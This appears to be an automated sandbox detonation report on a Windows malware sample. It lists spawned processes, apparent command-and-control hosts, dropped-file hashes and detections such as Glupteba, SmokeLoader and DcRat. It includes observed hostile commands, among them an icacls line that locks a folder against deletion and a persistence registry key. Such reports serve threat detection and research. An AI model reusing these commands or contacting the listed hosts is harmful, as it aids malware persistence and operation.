reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\6F19.exe
C:\Users\Admin\AppData\Local\Temp\6F19.exe
C:\Users\Admin\AppData\Local\Temp\6F19.exe
C:\Users\Admin\AppData\Local\Temp\6F19.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\bf75f872-64ea-4beb-9242-0cdc8b441b91" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\6F19.exe
"C:\Users\Admin\AppData\Local\Temp\6F19.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\6F19.exe
"C:\Users\Admin\AppData\Local\Temp\6F19.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe
"C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe"
C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe
"C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 1448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| US | 104.21.65.148:443 | namecloudvideo.org | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 104.21.10.217:443 | shipbank.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| US | 8.8.8.8:53 | 1bdbdf79-a0b9-43d6-ad0f-0f24eff7842b.uuid.realupdate.ru | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| SA | 169.148.70.65:80 | sdfjhuz.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 188.114.97.2:443 | api.2ip.ua | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 188.114.97.2:443 | api.2ip.ua | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| SA | 169.148.70.65:80 | sdfjhuz.com | tcp |
| KR | 175.120.254.9:80 | sajdfue.com | tcp |
| KR | 175.120.254.9:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| DE | 78.46.233.36:9000 | 78.46.233.36 | tcp |
| DE | 78.46.233.36:9000 | 78.46.233.36 | tcp |
| DE | 78.46.233.36:9000 | 78.46.233.36 | tcp |
| DE | 78.46.233.36:9000 | 78.46.233.36 | tcp |
| US | 204.79.197.219:443 | tcp |
Files
memory/2728-0-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-2-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2728-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-13-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2728-14-0x00000000746A0000-0x0000000074D8E000-memory.dmp
memory/2728-15-0x0000000004220000-0x0000000004260000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar55A6.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 80e016c08a337d423b0ed3c4888c07d8 |
| SHA1 | f737d3efa1282ba8caefbd0d144d73bfaf5ad76d |
| SHA256 | add7ce69f6f50c6e6966953f1923652373bb22ef29dade2077668b8cd9108398 |
| SHA512 | 20304feb78ab758a5b204506d165f67de528fa43d23e04887037c95b1193d11e7d5f5dc98b0c9b22cdca048e294a9477c9573667efd54032e3fe9e32d47fefa9 |
\Users\Admin\Pictures\lhaKue16whW8WUISCby4hZAF.exe
| MD5 | 328adf79d56fef9b88089e2ccb17c8a0 |
| SHA1 | 35a90318f8ab8ec3f99ca37b9d4b212e78867420 |
| SHA256 | d8e189e63bbe2fe65b973190b5ed8dbad9e7e90d2a086cfc0f1745c3d06e525b |
| SHA512 | f16e15cf2f1012ceeba6017590e5f5fa3aec4a6441b29df6808d4f68fdbca4201d53c25aca84cba9549fff052864a5ec7ff7dc9022bd75e07fa4e9b5c8284667 |
memory/1408-174-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-L1KPC.tmp\lhaKue16whW8WUISCby4hZAF.tmp
| MD5 | 085aca27fe0b6d4c479500fb4a586129 |
| SHA1 | 88e775fab99e3bc02e2bc44b0171b8a70cc5f9a3 |
| SHA256 | 6cdeb9602e2346ea8c4b86eaf32bf07dea3350a9fa4ae99f5c15fcde96055cb7 |
| SHA512 | a7d37e57f1421a8b407204aad3089995dd2eb6fc03a37dbb0f2b8a3c387143f55e1e41c04059db265f330e96fd17d8d7c56bfc4398810b90b69cbe59e156339b |
\Users\Admin\Pictures\NolrxR1gqvTZnweAPnvkbGms.exe
| MD5 | d51f80d00267e9fc01cc48ac8f95011d |
| SHA1 | b6ef313ff8d11539efea9dc5af320c02322cf7cd |
| SHA256 | 6b7b6ad3d8629398cec54420ad9e9680c0af3cebffb3472ae74529d54413610f |
| SHA512 | 345aef01f0915cfcf2bf63a0d6306e4c6cc94dd2c4e6f697f3950223426fe633ac4ae132948a9523422a0d5249cf2ff266252e1b25f1e1f796525af409303541 |
memory/2728-192-0x00000000746A0000-0x0000000074D8E000-memory.dmp
memory/1500-193-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-SLHBC.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-SLHBC.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\Pictures\NolrxR1gqvTZnweAPnvkbGms.exe
| MD5 | 3cb379bc5693907e79679015e56e1045 |
| SHA1 | 7362d306923507aa12e94eb7dbcae9f30f398df2 |
| SHA256 | 6daca81b06d8f24046407bf14712583deb94ba329f1611c7f33de7ec097d15fc |
| SHA512 | b59dfb846621cb4e99271003885daddf01895fb7ada553ce7be77c42c8ccfcf252ec187562d58f11eabed2ebece64f71e0a65b63d9019b8803e6b105ffb770ca |
\Users\Admin\AppData\Local\Temp\syncUpd.exe
| MD5 | 4daa194c9f29f77b6a97afcc50793020 |
| SHA1 | fa03fe3b16bc39ca17366c7b22bd71d0693cbf6f |
| SHA256 | 421f8d69e9d99d7e447bae84e0574e19c9210c6f6121944408be0669aa63c56e |
| SHA512 | 0638935945b3c181b59bda9dc13e53fc88cbbabe046af0460049f6e89688a9cd4e67783b93002330aa94cd25a04db492e1791bad4cc6c634ab6975affd63ba05 |
\Users\Admin\AppData\Local\Temp\nst8835.tmp\INetC.dll
| MD5 | 2b342079303895c50af8040a91f30f71 |
| SHA1 | b11335e1cb8356d9c337cb89fe81d669a69de17e |
| SHA256 | 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f |
| SHA512 | 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47 |
\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
| MD5 | 78441713602f8860f76dcb726d35c787 |
| SHA1 | be11ed46be79a6bf22290a887cc289d7a9bdeb48 |
| SHA256 | 99e1a8a9641c7592de2101ed1de297d37226036e29f7839ca93c7ad5409a60af |
| SHA512 | ab23f06273f4337c2ec0bb8ee53c736cfb93b6b58bb700a43c969be7c233881474afca360d21bad952a0f19f25ee8cb675f8ea7cce1e9f0f41c41033f12baef6 |
C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
| MD5 | 482dd0af025d3f44d682c90e31226693 |
| SHA1 | 3ba175cf8249b21ac966419e67d42d4d448bc3a8 |
| SHA256 | 75a57865393d70ec57a6bfd8dd4c1a6947391500600b1b1c6fe66e5b35a8b0a8 |
| SHA512 | ea2fef120bf3a0c75de5426d547c76f07d910b05d678daed9b37c9c98f441e3054aa4e6702e399500cfa953de9f2a3f62974f9cfbf148259a544d5f03c1f1559 |
C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
| MD5 | 8a8590f9ead0c82250938616f05ed580 |
| SHA1 | c453ea2dfa02f192c473459d57776470adb27701 |
| SHA256 | 2a8e165b9a5970c01678e7aad11c8c762875b58e0bf34a4c5ebd5ee5c50c214f |
| SHA512 | b673a68911349b02e6b973f8f05f37a946d6e5b8ca98cfd63c7da1411b39d6d84f7e4e82e35bdd22676190aceeebb849754dc2278a28fccf31aca1db354e29a7 |
\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
| MD5 | a986ce3528016c2ffcde420bb96b512d |
| SHA1 | 8b585b93affe59368178e9023d996313d7f47c9d |
| SHA256 | 2649c645c83931d868558ef841c1ff6d0b7437e04afe2d42aa3767335ad020d7 |
| SHA512 | ac7856b4e02c388655220169396f248d16f03ed1bb42a37754941dc6b8156cb71fe3ea6eeac8a96a4ec2d83b19bfe46d1a1b9a23bb40fc4aa7f71b1b8656035e |
C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe
| MD5 | 38783b735530ec3595f8cfc57704e0a4 |
| SHA1 | 297d2424423506702a6f42fff06b37a89a9fc8e6 |
| SHA256 | 95d772adaee04f58f13c59ab65bcbefe9d6d6b2fc9b0f5fb6b4304902c5b2a8d |
| SHA512 | 980ff17ecdd36f1efbaced0b9599d4032eb4b27d5836c7d9d26828e478a75c73f4604bb568052aacc7519a54feb517efbf475e4d2610d8af6dbd4d6afb45fb4f |
memory/1536-247-0x0000000002670000-0x0000000002A68000-memory.dmp
C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe
| MD5 | fbd8c3441a6860996d762513c9db1bc9 |
| SHA1 | bf1c2916cec7eeb327d0857a1f484268425a7239 |
| SHA256 | dbdc20d075f94e8979dd5a75f6a26b47d60de1e88552bfda1805abab08f6454a |
| SHA512 | c516760a64d2a5c166ba6cc14cda4b558c2f9db53465a98bfc50cc78c9a237809cb7a725f6e987ce32c93f8c49e6f1c1135fe7995bfd47df2c71030842ff6216 |
memory/1216-250-0x00000000029D0000-0x00000000029E6000-memory.dmp
memory/1872-251-0x0000000000400000-0x0000000000437000-memory.dmp
memory/1872-253-0x00000000005A3000-0x00000000005B1000-memory.dmp
memory/1872-254-0x0000000000220000-0x000000000022B000-memory.dmp
memory/1536-258-0x0000000002670000-0x0000000002A68000-memory.dmp
memory/1536-257-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1536-259-0x0000000002A70000-0x000000000335B000-memory.dmp
memory/2824-276-0x00000000024B0000-0x00000000028A8000-memory.dmp
memory/2828-277-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 2ec31076d683cf595adf4cbafa1decaf |
| SHA1 | 2eb30b05f06b5b2fb713f5b3c9a77e688a960da5 |
| SHA256 | 9ad06ce953efb55a21808915e20a9ad7207f81ad0c12c1dbd61bdb78118c3aeb |
| SHA512 | 3ffd9fe7fd9d4574c7e39a6c5f80d09a82f87b281b1c74f088afe421f7b8b306262ba0f6156fad262f036b69c5a51e5f0a3ff62be54e51097b94919c041f1a08 |
memory/2824-314-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2824-315-0x00000000024B0000-0x00000000028A8000-memory.dmp
memory/2152-323-0x0000000000400000-0x0000000000459000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | eeec6de42a9722eade59935376fdae88 |
| SHA1 | d4a4682680674e9f151a2a5544795758e4d9d824 |
| SHA256 | d8079f789a1d2d6dc9c4362243db3bf5ff9433a4dd938bef103620a7a6d34b48 |
| SHA512 | db4d3b7d3955bae64d27333b7404f096c75121de71f902121382cccaf79dc4ed16cf04b5fdaf80f7e5d78fb3d5aeeff5a0dbacc1cf1ec79d9a31acfc05bdbeb3 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 83136f38c4a7f35670b7c621ddb3758b |
| SHA1 | 775896a3b1508a92c700c7ecf0618623eac9a8fe |
| SHA256 | 9e7a82abd386798c82788cbd73d4b8f0c20a8a489f1092254d796312c30d9fe3 |
| SHA512 | 551ea18d199376198e42c9c6cec25bc7e9a97c9fa5b699b48ba1fd4e62658b82e3898ab9e4dc56cc81db7676e2dfb1075e4533724f0734973db0f856c2a55f15 |
memory/1732-326-0x0000000002620000-0x0000000002A18000-memory.dmp
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
C:\Users\Admin\AppData\Local\Temp\3B6B.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa11f347ee87e890bba56ad98e5f8f59 |
| SHA1 | 3be5964c311fd6636449f4ba3aef19d3794dc8ca |
| SHA256 | 676ee5f935449e8ee1239796ae768a86905b5709973a4d721c03d6b938a0d584 |
| SHA512 | 2e9c32fd657828079fdbf3618b5a091b101e9be3cde328db70a9a2c5f9e306f2c0c36475d129285d291e2345bcc779efe84794583936272cf5373827cafb85d6 |
C:\Users\Admin\AppData\Local\Temp\6F19.exe
| MD5 | b5012ad3f7b79ece2bf795a53b69fd9e |
| SHA1 | 40cffd108e02bc172f9c632e6da0d6abe468846f |
| SHA256 | 1e85da371e7d28623567725f04af71d792c7e3323f42fddd53500e691249002a |
| SHA512 | b7bfe32b5dae377b773d67e9cb7fde7e4052514cfd928252963babafa0234429a5a2c28dfd7ff38c3fcb9a728e742506f7b3c095a04cd950f1296a0e664878b5 |
C:\Users\Admin\AppData\Local\Temp\6F19.exe
| MD5 | 2fbbb06d9f40eed8c34d9583c74e73ae |
| SHA1 | bde94386fac3f4d6df9bdabc4f1022916eacf968 |
| SHA256 | 2dabe2118e640c35b540c93af67e96899f70d7d41c2e14cfc18ec237739c41d1 |
| SHA512 | 26cd70a382d2bd07a1c1dac1a89258b2e0e0a441c77f599926e4ec0724652432a96a5bf538fe60c4667238fd989e5c6ef5e7a98c295a3276aa6312d054b6fe72 |
memory/2484-408-0x0000000000220000-0x00000000002B2000-memory.dmp
memory/1876-411-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1876-413-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2484-416-0x0000000000220000-0x00000000002B2000-memory.dmp
memory/2484-420-0x0000000001E20000-0x0000000001F3B000-memory.dmp
memory/1876-421-0x0000000000400000-0x0000000000537000-memory.dmp
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 17419eb8ce7fecd54fb1c48bf233d0a1 |
| SHA1 | 8142fa6ac9e59fc61bc1e8395357cc593b52593e |
| SHA256 | 6b8ed5bf7421d81239f24fd924ba59ffd1b79317ae7f6969e371af9416f5bbe1 |
| SHA512 | 9cafd96fb1679408b41fad56c80ddc8d4a0cdd201257e7439d8fa36637474d2d2b8943e95d104a9745767440d31ea5fda17672cc434c0fb28303335356d19a89 |
memory/1876-459-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2948-462-0x0000000000360000-0x00000000003F2000-memory.dmp
memory/2948-469-0x0000000000360000-0x00000000003F2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | eb96f07633ddfd91017eb8346bc61045 |
| SHA1 | b5b67767a37275a59e1a05bb4dbc9e2f5061ec1c |
| SHA256 | f535edcbdcb9404a4f27a98f45942c99e00ba38ad49a55d44dce61d6b0a66c5a |
| SHA512 | d3d270572494b64d440bacfef96880a84364e7a401b66d318a4004d0ad4017b09ea5e8a834387d78df00233ba7622bc37b4504339fe8c9049f6a785dfb115a67 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | f461bbe62b7d0ecb6d410ecb2a8f5f99 |
| SHA1 | 49a22334941d9830647f4a14e27ce8fae99b2f21 |
| SHA256 | da736c5fd3b804a5b5ef646ba348ff5579773279225880400fb0e4b317ffaa77 |
| SHA512 | 418d85dbbc53bf458095a49908481cd7ea4836f5602726c26aa0a20563a5b185e8cab076932e317674e63164246ca962b424732ef7f10788a58b8e36d99b8e96 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | f2909676fb8ee02c35614f2b40e0eaac |
| SHA1 | c06ba7b1c343da8c5a1d40829d4343c2cf258837 |
| SHA256 | 77a760a8d9cc583d1ad30b3843fa5232c83bbb6d761ece67f48487b4bee34e02 |
| SHA512 | 9002bf1d25a1267d31e1c1428c40432c3ec727b0da4099fec5c307391426caeb46fdef1446f6d1a4de7832330a84307457231930eb12ec23e1e02fd5333cd0be |
memory/2732-484-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2732-485-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2732-489-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe
| MD5 | d37b17fc3b9162060a60cd9c9f5f7e2c |
| SHA1 | 5bcd761db5662cebdb06f372d8cb731a9b98d1c5 |
| SHA256 | 36826a94f7aabd1f0d71abc6850e64a499768bd30cab361e8724d546e495e35f |
| SHA512 | 04b0fcc597afba17b8be46eacee58c7e8d38c7efa9247ab5b3cbf1ae3ed8dc2e6e909b7dab28b2a41f08fb37e950abb6ca97553adf0e20335c6864d942bef6ea |
memory/2732-503-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2828-502-0x0000000000400000-0x000000000063B000-memory.dmp
memory/2732-495-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2828-504-0x0000000000803000-0x0000000000818000-memory.dmp
memory/2828-505-0x0000000000220000-0x0000000000247000-memory.dmp
memory/2072-511-0x0000000000342000-0x000000000035E000-memory.dmp
memory/2072-513-0x00000000001C0000-0x00000000001F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-10 12:34
Reported
2024-03-10 12:37
Platform
win10v2004-20240226-en
Max time kernel
123s
Max time network
162s
Command Line
Signatures
DcRat
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socks5Systemz
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
